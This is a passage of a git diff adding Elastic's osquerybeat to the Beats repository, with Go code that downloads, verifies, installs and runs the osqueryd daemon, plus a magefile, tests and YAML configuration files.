b/x-pack/osquerybeat/internal/distro/distro.go @@ -0,0 +1,115 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package distro + +import ( + "errors" + "fmt" + "os" + "path/filepath" + "runtime" +) + +var ( + ErrUnsupportedOS = errors.New("unsupported OS") +) + +var ( + DataDir = filepath.Clean("build/data") + DataInstallDir = filepath.Join(DataDir, "install") + DataCacheDir = filepath.Join(DataDir, "cache") +) + +const ( + osqueryDownloadBaseURL = "https://pkg.osquery.io" + osqueryName = "osquery" + osqueryDName = "osqueryd" + osqueryPath = "usr/local/bin" + osqueryVersion = "4.7.0" + osqueryMSIExt = ".msi" + osqueryPkgExt = ".pkg" + + osqueryDistroDarwinSHA256 = "31244705a497f7b33eaee6b4995cea9a4b55a3b9b0f20ea4bab400ff8798cbb4" + osqueryDistroLinuxSHA256 = "2086b1e2bf47b25a5eb64e35d516f222b2bd1c50610a71916ebb29af9d0ec210" + osqueryDistroWindowsSHA256 = "54a98345e7f5ad6819f5516e7f340795cf42b83f4fda221c4a10bfd83f803758" +) + +func OsquerydVersion() string { + return osqueryVersion +} + +func OsquerydFilename() string { + if runtime.GOOS == "windows" { + return osqueryDName + ".exe" + } + return osqueryDName +} + +func OsquerydPath(dir string) string { + return filepath.Join(dir, OsquerydFilename()) +} + +func OsquerydDistroPath() string { + return OsquerydPath(osqueryPath) +} + +func OsquerydDistroFilename() string { + return OsquerydDistroPlatformFilename(runtime.GOOS) +} + +func OsquerydDistroPlatformFilename(platform string) string { + switch platform { + case "windows": + return osqueryName + "-" + osqueryVersion + osqueryMSIExt + case "darwin": + return osqueryName + "-" + osqueryVersion + osqueryPkgExt + } + return OsquerydFilename() +} + +type Spec struct { + PackSuffix string + SHA256Hash string + Extract bool +} + +func (s Spec) DistroFilename() string { + return osqueryName + "-" + osqueryVersion + s.PackSuffix +} + +func (s Spec) DistroFilepath(dir string) string { + return filepath.Join(dir, s.DistroFilename()) +} + +func (s Spec) InstalledFilename() string { + if s.Extract { + return osqueryDName + } + return s.DistroFilename() +} + +func (s Spec) InstalledMode() os.FileMode { + if s.Extract { + return 0755 + } + return 0644 +} + +func (s Spec) URL(osname string) string { + return osqueryDownloadBaseURL + "/" + osname + "/" + s.DistroFilename() +} + +var specs = map[string]Spec{ + "linux": {"_1.linux_x86_64.tar.gz", osqueryDistroLinuxSHA256, true}, + "darwin": {osqueryPkgExt, osqueryDistroDarwinSHA256, false}, + "windows": {osqueryMSIExt, osqueryDistroWindowsSHA256, false}, +} + +func GetSpec(osname string) (spec Spec, err error) { + if spec, ok := specs[osname]; ok { + return spec, nil + } + return spec, fmt.Errorf("%s: %w", osname, ErrUnsupportedOS) +} diff --git a/x-pack/osquerybeat/internal/fetch/fetch.go b/x-pack/osquerybeat/internal/fetch/fetch.go new file mode 100644 index 00000000000..4de7bc326b8 --- /dev/null +++ b/x-pack/osquerybeat/internal/fetch/fetch.go @@ -0,0 +1,48 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fetch + +import ( + "fmt" + "io/ioutil" + "log" + "net/http" + "os" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/hash" +) + +func Download(url, fp string) (hashout string, err error) { + log.Printf("Download %s to %s", url, fp) + + cli := http.Client{} + + res, err := cli.Get(url) + if err != nil { + return + } + defer res.Body.Close() + + if res.StatusCode != http.StatusOK { + // Read body for extended error message + b, err := ioutil.ReadAll(res.Body) + var s string + if err != nil { + log.Printf("Failed to read the error response body: %v", err) + } else { + s = string(b) + } + return hashout, fmt.Errorf("failed fetch %s, status: %d, message: %s", url, res.StatusCode, s) + } + + out, err := os.OpenFile(fp, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0666) + if err != nil { + return + } + defer out.Close() + + // Calculate hash and write file + return hash.Calculate(res.Body, out) +} diff --git a/x-pack/osquerybeat/internal/fileutil/fileutil.go b/x-pack/osquerybeat/internal/fileutil/fileutil.go new file mode 100644 index 00000000000..62c02f54858 --- /dev/null +++ b/x-pack/osquerybeat/internal/fileutil/fileutil.go @@ -0,0 +1,16 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package fileutil + +import "os" + +func FileExists(fp string) (ok bool, err error) { + if _, err = os.Stat(fp); err == nil { + ok = true + } else if os.IsNotExist(err) { + err = nil + } + return +} diff --git a/x-pack/osquerybeat/internal/hash/hash.go b/x-pack/osquerybeat/internal/hash/hash.go new file mode 100644 index 00000000000..e9338e27b68 --- /dev/null +++ b/x-pack/osquerybeat/internal/hash/hash.go @@ -0,0 +1,28 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package hash + +import ( + "crypto/sha256" + "encoding/hex" + "io" +) + +// Calculate hash with optional writer to compbine, useful when streaming data to the disk +func Calculate(r io.Reader, w io.Writer) (string, error) { + h := sha256.New() + + if w != nil { + w = io.MultiWriter(h, w) + } else { + w = h + } + + if _, err := io.Copy(w, r); err != nil { + return "", err + } + + return hex.EncodeToString(h.Sum(nil)), nil +} diff --git a/x-pack/osquerybeat/internal/install/install.go b/x-pack/osquerybeat/internal/install/install.go new file mode 100644 index 00000000000..6a4eca1493f --- /dev/null +++ b/x-pack/osquerybeat/internal/install/install.go @@ -0,0 +1,95 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package install + +import ( + "context" + "fmt" + "os" + "os/exec" + "path" + "path/filepath" + "runtime" + + "github.com/gofrs/uuid" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/command" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil" +) + +func InstallFromPkg(ctx context.Context, srcPkg, dstDir string, force bool) error { + dstfp := filepath.Join(dstDir, distro.OsquerydFilename()) + + dir, err := installFromCommon(ctx, srcPkg, dstDir, dstfp, force, "pkgutil", "--expand-full", srcPkg) + // Remove the directory that was created could have been created by pkgutil + // In case if the process was killed or finished with error but still left a directory behind + defer os.RemoveAll(dir) + + if err != nil { + return err + } + + // Copy over the osqueryd from under Payload into the dstDir directory + return devtools.Copy(path.Join(dir, "Payload", distro.OsquerydDistroPath()), dstfp) +} + +func InstallFromMSI(ctx context.Context, srcMSI, dstDir string, force bool) error { + dstfp := filepath.Join(dstDir, distro.OsquerydFilename()) + + // Winderz is odd, passing params to msiexec as usual didn't work + dir, err := installFromCommon(ctx, srcMSI, dstDir, dstfp, force, "msiexec", `/quiet /a "`+srcMSI+`"`) + + // Remove the directory that was created could have been created by msiexec + // In case if the process was killed or finished with error but still left a directory behind + defer os.RemoveAll(dir) + + if err != nil { + return err + } + + // Copy over the osqueryd from under osquery/osqueryd into the dstDir directory + return devtools.Copy(path.Join(dir, "osquery", distro.OsquerydPath("osqueryd")), dstfp) +} + +func installFromCommon(ctx context.Context, srcfp, dstDir, dstfp string, force bool, name string, arg ...string) (dir string, err error) { + if !force { + //check if files exists + exists, err := fileutil.FileExists(dstfp) + if err != nil { + return dir, err + } + if exists { + return dir, nil + } + } + + if err := os.MkdirAll(dstDir, 0750); err != nil { + return dir, fmt.Errorf("failed to create dir %v, %w", dstDir, err) + } + + // Temp directory for extracting the .pkg or .msi + uid := uuid.Must(uuid.NewV4()).String() + dir = filepath.Join(dstDir, uid) + + if runtime.GOOS == "darwin" { + arg = append(arg, dir) + // Extract .pkg + _, err = command.Execute(ctx, name, arg...) + return dir, err + } + + // Extract .msi + idx := len(arg) - 1 + arg[idx] = arg[idx] + ` TARGETDIR="` + dir + `"` + cmd := exec.Command(name) + + // Set directly to avoid args escaping + setCommandArg(cmd, arg[idx]) + + return dir, cmd.Run() +} diff --git a/x-pack/osquerybeat/internal/install/install_unix.go b/x-pack/osquerybeat/internal/install/install_unix.go new file mode 100644 index 00000000000..6a16368540b --- /dev/null +++ b/x-pack/osquerybeat/internal/install/install_unix.go @@ -0,0 +1,13 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +//+build !windows + +package install + +import "os/exec" + +func setCommandArg(cmd *exec.Cmd, arg string) { + // Noop in *nix +} diff --git a/x-pack/osquerybeat/internal/install/install_windows.go b/x-pack/osquerybeat/internal/install/install_windows.go new file mode 100644 index 00000000000..b28608e7e92 --- /dev/null +++ b/x-pack/osquerybeat/internal/install/install_windows.go @@ -0,0 +1,22 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +//+build windows + +package install + +import ( + "os/exec" + "syscall" +) + +func setCommandArg(cmd *exec.Cmd, arg string) { + // Winders hack to pass args to msiexec without escaping + // Set directly to avoid args escaping + cmd.SysProcAttr = &syscall.SysProcAttr{ + CmdLine: " " + arg, + HideWindow: false, + CreationFlags: 0, + } +} diff --git a/x-pack/osquerybeat/internal/osqueryd/client.go b/x-pack/osquerybeat/internal/osqueryd/client.go new file mode 100644 index 00000000000..f282cd6ddbd --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/client.go @@ -0,0 +1,95 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package osqueryd + +import ( + "context" + "errors" + "fmt" + "time" + + "github.com/elastic/beats/v7/libbeat/logp" + + "github.com/kolide/osquery-go" +) + +const ( + DefaultTimeout = 30 * time.Second + + retryWait = 200 * time.Millisecond + retryTimes = 10 + logTag = "osqueryd_cli" +) + +type Client struct { + cli *osquery.ExtensionManagerClient +} + +func NewClient(ctx context.Context, socketPath string, to time.Duration) (*Client, error) { + cli, err := newClientWithRetries(ctx, socketPath, to) + if err != nil { + return nil, err + } + return &Client{ + cli: cli, + }, nil +} + +func newClientWithRetries(ctx context.Context, socketPath string, to time.Duration) (cli *osquery.ExtensionManagerClient, err error) { + log := logp.NewLogger(logTag).With("socket_path", socketPath) + for i := 0; i < retryTimes; i++ { + attempt := i + 1 + llog := log.With("attempt", attempt) + llog.Debug("Connecting") + cli, err = osquery.NewClient(socketPath, to) + if err != nil { + llog.Debug("Failed to connect, err: %v", err) + if i < retryTimes-1 { + llog.Infof("Wait for %v before next connect attempt", retryWait) + if werr := waitWithContext(ctx, retryWait); werr != nil { + err = werr + break // Context cancelled, exit loop + } + } + continue + } + break + } + if err != nil { + log.Error("Failed to connect, err: %v", err) + } else { + log.Info("Connected.") + } + return cli, err +} + +func (c *Client) Close() { + if c.cli != nil { + c.cli.Close() + c.cli = nil + } +} + +func (c *Client) Query(ctx context.Context, sql string) ([]map[string]string, error) { + res, err := c.cli.Client.Query(ctx, sql) + if err != nil { + return nil, fmt.Errorf("osquery failed: %w", err) + } + if res.Status.Code != int32(0) { + return nil, errors.New(res.Status.Message) + } + return res.Response, nil +} + +func waitWithContext(ctx context.Context, to time.Duration) error { + t := time.NewTimer(to) + defer t.Stop() + select { + case <-ctx.Done(): + return context.Canceled + case <-t.C: + } + return nil +} diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd.go new file mode 100644 index 00000000000..f45bc0dc870 --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd.go @@ -0,0 +1,126 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package osqueryd + +import ( + "context" + "fmt" + "io" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" +) + +// The subdirectory to hold .pid, .db, .sock and other work file for osqueryd sub process. Open for discussion. +// Will see later what needs to be parameterized and what not. +const ( + osquerySubdir = "osquery" + extensionsTimeout = 10 +) + +type OsqueryD struct { + RootDir string + SocketPath string +} + +// TODO(AM): finalize what to do with config file, how much of the config file we need etc. Open question for now. +func (q *OsqueryD) Start(ctx context.Context) (<-chan error, error) { + log := logp.NewLogger("osqueryd").With("dir", q.RootDir).With("socket_path", q.SocketPath) + log.Info("Starting process") + + dir := filepath.Join(q.RootDir, osquerySubdir) + + if err := os.MkdirAll(dir, 0700); err != nil { + return nil, fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + cmd := q.createCommand(log, dir) + + cmd.SysProcAttr = setpgid() + + stderr, err := cmd.StderrPipe() + if err != nil { + return nil, err + } + + err = cmd.Start() + if err != nil { + return nil, err + } + + var ( + errbuf strings.Builder + ) + + wait := func() error { + if _, cerr := io.Copy(&errbuf, stderr); cerr != nil { + return cerr + } + return cmd.Wait() + } + + finished := make(chan error, 1) + + go func() { + finished <- wait() + }() + + done := make(chan error, 1) + go func() { + var ferr error + select { + case ferr = <-finished: + if ferr != nil { + s := strings.TrimSpace(errbuf.String()) + if s != "" { + ferr = fmt.Errorf("%s: %w", s, ferr) + } + } + if ferr != nil { + log.Errorf("Process exited with error: %v", ferr) + } else { + log.Info("Process exited") + } + case <-ctx.Done(): + log.Info("Kill process group on context done") + killProcessGroup(cmd) + // Wait till finished + <-finished + ferr = ctx.Err() + } + done <- ferr + }() + + return done, err +} + +func (q *OsqueryD) createCommand(log *logp.Logger, dir string) *exec.Cmd { + + cmd := exec.Command( + distro.OsquerydPath(q.RootDir), + "--force=true", + "--disable_watchdog", + "--utc", + "--pidfile="+path.Join(dir, "osquery.pid"), + "--database_path="+path.Join(dir, "osquery.db"), + "--extensions_socket="+q.SocketPath, + "--config_path="+path.Join(dir, "osquery.conf"), + "--logger_path="+dir, + "--extensions_autoload="+path.Join(dir, "osquery.autoload"), + fmt.Sprint("--extensions_timeout=", extensionsTimeout), + ) + + cmd.Args = append(cmd.Args, platformArgs()...) + + if log.IsDebug() { + cmd.Args = append(cmd.Args, "--verbose") + } + return cmd +} diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go new file mode 100644 index 00000000000..18f00603edc --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go @@ -0,0 +1,34 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build !windows + +package osqueryd + +import ( + "os/exec" + "path/filepath" + "syscall" + + "github.com/pkg/errors" +) + +func SocketPath(dir string) string { + return filepath.Join(dir, "osquery.sock") +} + +func platformArgs() []string { + return nil +} + +func setpgid() *syscall.SysProcAttr { + return &syscall.SysProcAttr{Setpgid: true} +} + +// Borrowed from https://github.com/kolide/launcher/blob/master/pkg/osquery/runtime/runtime_helpers.go#L20 +// For clean process tree kill +func killProcessGroup(cmd *exec.Cmd) error { + err := syscall.Kill(-cmd.Process.Pid, syscall.SIGKILL) + return errors.Wrapf(err, "kill process group %d", cmd.Process.Pid) +} diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go new file mode 100644 index 00000000000..0b7d881f041 --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go @@ -0,0 +1,37 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build windows + +package osqueryd + +import ( + "fmt" + "os/exec" + "syscall" + + "github.com/gofrs/uuid" +) + +func SocketPath(dir string) string { + return `\\.\pipe\elastic\osquery\` + uuid.Must(uuid.NewV4()).String() +} + +func platformArgs() []string { + return []string{ + "--allow_unsafe", + } +} + +func setpgid() *syscall.SysProcAttr { + return &syscall.SysProcAttr{} +} + +// Borrowed from https://github.com/kolide/launcher/blob/master/pkg/osquery/runtime/runtime_helpers_windows.go#L25 +// For clean process tree kill +func killProcessGroup(cmd *exec.Cmd) error { + // https://github.com/golang/dep/pull/857 + exec.Command("taskkill", "/F", "/T", "/PID", fmt.Sprint(cmd.Process.Pid)).Run() + return nil +} diff --git a/x-pack/osquerybeat/internal/tar/tar.go b/x-pack/osquerybeat/internal/tar/tar.go new file mode 100644 index 00000000000..19056bae8b0 --- /dev/null +++ b/x-pack/osquerybeat/internal/tar/tar.go @@ -0,0 +1,91 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package tar + +import ( + "archive/tar" + "compress/gzip" + "fmt" + "io" + "os" + "path/filepath" + "strings" +) + +func shouldExtract(name string, files ...string) bool { + if files == nil { + return true + } + + for _, f := range files { + if strings.HasPrefix(f, name) { + return true + } + } + return false +} + +func ExtractFile(fp string, destinationDir string, files ...string) error { + f, err := os.Open(fp) + if err != nil { + return err + } + defer f.Close() + zr, err := gzip.NewReader(f) + if err != nil { + return err + } + + return Extract(zr, destinationDir, files...) +} + +func Extract(r io.Reader, destinationDir string, files ...string) error { + tarReader := tar.NewReader(r) + + for { + header, err := tarReader.Next() + if err != nil { + if err == io.EOF { + break + } + return err + } + if !shouldExtract(header.Name, files...) { + continue + } + + path := filepath.Join(destinationDir, header.Name) + if !strings.HasPrefix(path, destinationDir) { + return fmt.Errorf("illegal file path in tar: %v", header.Name) + } + + switch header.Typeflag { + case tar.TypeDir: + if err = os.MkdirAll(path, os.FileMode(header.Mode)); err != nil { + return err + } + case tar.TypeReg: + writer, err := os.Create(path) + if err != nil { + return err + } + + if _, err = io.Copy(writer, tarReader); err != nil { + return err + } + + if err = os.Chmod(path, os.FileMode(header.Mode)); err != nil { + return err + } + + if err = writer.Close(); err != nil { + return err + } + default: + return fmt.Errorf("unable to untar type=%c in file=%s", header.Typeflag, path) + } + } + return nil +} diff --git a/x-pack/osquerybeat/magefile.go b/x-pack/osquerybeat/magefile.go new file mode 100644 index 00000000000..f16696dba5e --- /dev/null +++ b/x-pack/osquerybeat/magefile.go @@ -0,0 +1,97 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build mage + +package main + +import ( + "fmt" + "time" + + "github.com/magefile/mage/mg" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + osquerybeat "github.com/elastic/beats/v7/x-pack/osquerybeat/scripts/mage" + + // mage:import + _ "github.com/elastic/beats/v7/dev-tools/mage/target/common" + + // mage:import + _ "github.com/elastic/beats/v7/dev-tools/mage/target/pkg" + // mage:import + _ "github.com/elastic/beats/v7/dev-tools/mage/target/unittest" + // mage:import + _ "github.com/elastic/beats/v7/dev-tools/mage/target/integtest/notests" + // mage:import + _ "github.com/elastic/beats/v7/dev-tools/mage/target/test" +) + +func init() { + devtools.BeatDescription = "Osquerybeat is a beat implementation for osquery." + devtools.BeatLicense = "Elastic License" +} + +func Build() error { + params := devtools.DefaultBuildArgs() + + // Building functionbeat manager + return devtools.Build(params) +} + +// GolangCrossBuild build the Beat binary inside of the golang-builder. +// Do not use directly, use crossBuild instead. +func GolangCrossBuild() error { + return devtools.GolangCrossBuild(devtools.DefaultGolangCrossBuildArgs()) +} + +// BuildGoDaemon builds the go-daemon binary (use crossBuildGoDaemon). +func BuildGoDaemon() error { + return devtools.BuildGoDaemon() +} + +// CrossBuild cross-builds the beat for all target platforms. +func CrossBuild() error { + return devtools.CrossBuild() +} + +// CrossBuildGoDaemon cross-builds the go-daemon binary using Docker. +func CrossBuildGoDaemon() error { + return devtools.CrossBuildGoDaemon() +} + +// Package packages the Beat for distribution. +// Use SNAPSHOT=true to build snapshots. +// Use PLATFORMS to control the target platforms. +// Use VERSION_QUALIFIER to control the version qualifier. +func Package() { + start := time.Now() + defer func() { fmt.Println("package ran for", time.Since(start)) }() + + devtools.MustUsePackaging("osquerybeat", "x-pack/osquerybeat/dev-tools/packaging/packages.yml") + + // Add osquery distro binaries + osquerybeat.CustomizePackaging() + + mg.Deps(Update, osquerybeat.FetchOsqueryDistros) + mg.Deps(CrossBuild, CrossBuildGoDaemon) + mg.SerialDeps(devtools.Package, TestPackages) +} + +// TestPackages tests the generated packages (i.e. file modes, owners, groups). +func TestPackages() error { + return devtools.TestPackages() +} + +// Update is an alias for update:all. This is a workaround for +// https://github.com/magefile/mage/issues/217. +func Update() { mg.Deps(osquerybeat.Update.All) } + +// Fields is an alias for update:fields. This is a workaround for +// https://github.com/magefile/mage/issues/217. +func Fields() { mg.Deps(osquerybeat.Update.Fields) } + +// Config is an alias for update:config. This is a workaround for +// https://github.com/magefile/mage/issues/217. +func Config() { mg.Deps(osquerybeat.Update.Config) } diff --git a/x-pack/osquerybeat/main.go b/x-pack/osquerybeat/main.go new file mode 100644 index 00000000000..5889eb3ddbe --- /dev/null +++ b/x-pack/osquerybeat/main.go @@ -0,0 +1,19 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package main + +import ( + "os" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/cmd" + + _ "github.com/elastic/beats/v7/x-pack/osquerybeat/include" +) + +func main() { + if err := cmd.RootCmd.Execute(); err != nil { + os.Exit(1) + } +} diff --git a/x-pack/osquerybeat/main_test.go b/x-pack/osquerybeat/main_test.go new file mode 100644 index 00000000000..aac86e7fe18 --- /dev/null +++ b/x-pack/osquerybeat/main_test.go @@ -0,0 +1,32 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package main + +// This file is mandatory as otherwise the osquerybeat.test binary is not generated correctly. + +import ( + "flag" + "testing" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/cmd" +) + +var systemTest *bool + +func init() { + testing.Init() + systemTest = flag.Bool("systemTest", false, "Set to true when running system tests") + + cmd.RootCmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("systemTest")) + cmd.RootCmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("test.coverprofile")) +} + +// Test started when the test binary is started. Only calls main. +func TestSystem(t *testing.T) { + + if *systemTest { + main() + } +} diff --git a/x-pack/osquerybeat/osquerybeat.docker.yml b/x-pack/osquerybeat/osquerybeat.docker.yml new file mode 100644 index 00000000000..479c2930632 --- /dev/null +++ b/x-pack/osquerybeat/osquerybeat.docker.yml @@ -0,0 +1,11 @@ +osquerybeat: + period: 1s + +processors: + - add_cloud_metadata: ~ + - add_docker_metadata: ~ + +output.elasticsearch: + hosts: '${ELASTICSEARCH_HOSTS:elasticsearch:9200}' + username: '${ELASTICSEARCH_USERNAME:}' + password: '${ELASTICSEARCH_PASSWORD:}' diff --git a/x-pack/osquerybeat/osquerybeat.reference.yml b/x-pack/osquerybeat/osquerybeat.reference.yml new file mode 100644 index 00000000000..00f83169d6a --- /dev/null +++ b/x-pack/osquerybeat/osquerybeat.reference.yml @@ -0,0 +1,1191 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false + +# ================================== General =================================== + +# The name of the shipper that publishes the network data. It can be used to group +# all the transactions sent by a single shipper in the web interface. +# If this options is not defined, the hostname is used. +#name: + +# The tags of the shipper are included in their own field with each +# transaction published. Tags make it easy to group servers by different +# logical properties. +#tags: ["service-X", "web-tier"] + +# Optional fields that you can specify to add additional information to the +# output. Fields can be scalar values, arrays, dictionaries, or any nested +# combination of these. +#fields: +# env: staging + +# If this option is set to true, the custom fields are stored as top-level +# fields in the output document instead of being grouped under a fields +# sub-dictionary. Default is false. +#fields_under_root: false + +# Internal queue configuration for buffering events to be published. +#queue: + # Queue type by name (default 'mem') + # The memory queue will present all available events (up to the outputs + # bulk_max_size) to the output, the moment the output is ready to server + # another batch of events. + #mem: + # Max number of events the queue can buffer. + #events: 4096 + + # Hints the minimum number of events stored in the queue, + # before providing a batch of events to the outputs. + # The default value is set to 2048. + # A value of 0 ensures events are immediately available + # to be sent to the outputs. + #flush.min_events: 2048 + + # Maximum duration after which events are available to the outputs, + # if the number of events stored in the queue is < `flush.min_events`. + #flush.timeout: 1s + + # The disk queue stores incoming events on disk until the output is + # ready for them. This allows a higher event limit than the memory-only + # queue and lets pending events persist through a restart. + #disk: + # The directory path to store the queue's data. + #path: "${path.data}/diskqueue" + + # The maximum space the queue should occupy on disk. Depending on + # input settings, events that exceed this limit are delayed or discarded. + #max_size: 10GB + + # The maximum size of a single queue data file. Data in the queue is + # stored in smaller segments that are deleted after all their events + # have been processed. + #segment_size: 1GB + + # The number of events to read from disk to memory while waiting for + # the output to request them. + #read_ahead: 512 + + # The number of events to accept from inputs while waiting for them + # to be written to disk. If event data arrives faster than it + # can be written to disk, this setting prevents it from overflowing + # main memory. + #write_ahead: 2048 + + # The duration to wait before retrying when the queue encounters a disk + # write error. + #retry_interval: 1s + + # The maximum length of time to wait before retrying on a disk write + # error. If the queue encounters repeated errors, it will double the + # length of its retry interval each time, up to this maximum. + #max_retry_interval: 30s + + # The spool queue will store events in a local spool file, before + # forwarding the events to the outputs. + # + # Beta: spooling to disk is currently a beta feature. Use with care. + # + # The spool file is a circular buffer, which blocks once the file/buffer is full. + # Events are put into a write buffer and flushed once the write buffer + # is full or the flush_timeout is triggered. + # Once ACKed by the output, events are removed immediately from the queue, + # making space for new events to be persisted. + #spool: + # The file namespace configures the file path and the file creation settings. + # Once the file exists, the `size`, `page_size` and `prealloc` settings + # will have no more effect. + #file: + # Location of spool file. The default value is ${path.data}/spool.dat. + #path: "${path.data}/spool.dat" + + # Configure file permissions if file is created. The default value is 0600. + #permissions: 0600 + + # File size hint. The spool blocks, once this limit is reached. The default value is 100 MiB. + #size: 100MiB + + # The files page size. A file is split into multiple pages of the same size. The default value is 4KiB. + #page_size: 4KiB + + # If prealloc is set, the required space for the file is reserved using + # truncate. The default value is true. + #prealloc: true + + # Spool writer settings + # Events are serialized into a write buffer. The write buffer is flushed if: + # - The buffer limit has been reached. + # - The configured limit of buffered events is reached. + # - The flush timeout is triggered. + #write: + # Sets the write buffer size. + #buffer_size: 1MiB + + # Maximum duration after which events are flushed if the write buffer + # is not full yet. The default value is 1s. + #flush.timeout: 1s + + # Number of maximum buffered events. The write buffer is flushed once the + # limit is reached. + #flush.events: 16384 + + # Configure the on-disk event encoding. The encoding can be changed + # between restarts. + # Valid encodings are: json, ubjson, and cbor. + #codec: cbor + #read: + # Reader flush timeout, waiting for more events to become available, so + # to fill a complete batch as required by the outputs. + # If flush_timeout is 0, all available events are forwarded to the + # outputs immediately. + # The default value is 0s. + #flush.timeout: 0s + +# Sets the maximum number of CPUs that can be executing simultaneously. The +# default is the number of logical CPUs available in the system. +#max_procs: + +# ================================= Processors ================================= + +# Processors are used to reduce the number of fields in the exported event or to +# enhance the event with external metadata. This section defines a list of +# processors that are applied one by one and the first one receives the initial +# event: +# +# event -> filter1 -> event1 -> filter2 ->event2 ... +# +# The supported processors are drop_fields, drop_event, include_fields, +# decode_json_fields, and add_cloud_metadata. +# +# For example, you can use the following processors to keep the fields that +# contain CPU load percentages, but remove the fields that contain CPU ticks +# values: +# +#processors: +# - include_fields: +# fields: ["cpu"] +# - drop_fields: +# fields: ["cpu.user", "cpu.system"] +# +# The following example drops the events that have the HTTP response code 200: +# +#processors: +# - drop_event: +# when: +# equals: +# http.code: 200 +# +# The following example renames the field a to b: +# +#processors: +# - rename: +# fields: +# - from: "a" +# to: "b" +# +# The following example tokenizes the string into fields: +# +#processors: +# - dissect: +# tokenizer: "%{key1} - %{key2}" +# field: "message" +# target_prefix: "dissect" +# +# The following example enriches each event with metadata from the cloud +# provider about the host machine. It works on EC2, GCE, DigitalOcean, +# Tencent Cloud, and Alibaba Cloud. +# +#processors: +# - add_cloud_metadata: ~ +# +# The following example enriches each event with the machine's local time zone +# offset from UTC. +# +#processors: +# - add_locale: +# format: offset +# +# The following example enriches each event with docker metadata, it matches +# given fields to an existing container id and adds info from that container: +# +#processors: +# - add_docker_metadata: +# host: "unix:///var/run/docker.sock" +# match_fields: 